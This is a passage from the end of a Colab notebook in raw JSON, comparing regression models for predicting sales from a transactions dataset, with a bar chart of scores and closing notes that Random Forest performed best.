regressor.best_estimator_\n\n","execution_count":null,"outputs":[]},{"metadata":{"id":"SwIYIT1QC4yS","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":315},"outputId":"a6b94f76-815c-495e-fafc-eed8a452f409","trusted":true},"cell_type":"code","source":"# Creating summary report\nsummary_cols = ['Best Score']\nsummary = pd.DataFrame.from_dict(r2_dict, orient='index')\nsummary.index.name = 'Regressor'\nsummary.columns = summary_cols\nsummary = summary.reset_index()\n\n# Visualizing results\nplt.figure(figsize=(12,4))\nplt.xlabel('Best score')\nplt.title('Regressor Comparison')\n\nsns.barplot(x='Best Score', y='Regressor', data=summary)","execution_count":null,"outputs":[]},{"metadata":{"id":"ns3-4B4sD5pe","colab_type":"text"},"cell_type":"markdown","source":"# Conclusions\n"},{"metadata":{"id":"anKJ0JZFELV4","colab_type":"text"},"cell_type":"markdown","source":"This is a basic analysis of a transactions dataset with a model that predicts sales. Still a lot of things can be improved:\n\n\n* Perform cluster analysis and create features based on it\n* Make a deeper split of dates\n* Get more insights from Descriptions and Stock numbers\n* Compare domestic and abroad sales\n* Try deep learning models\n\nAlso we can play much more with tuning of hyperparameters of our models and give it more time for training.\n\nRandom Forest Regressor appears to be the best model for our prediction with R2 score more than 0.6 which is not that bad. \n\n"}],"metadata":{"colab":{"name":"Data Scientist test2.ipynb","provenance":[]},"kernelspec":{"name":"python3","display_name":"Python 3"}},"nbformat":4,"nbformat_minor":1} --------------------------------------------------------------------------------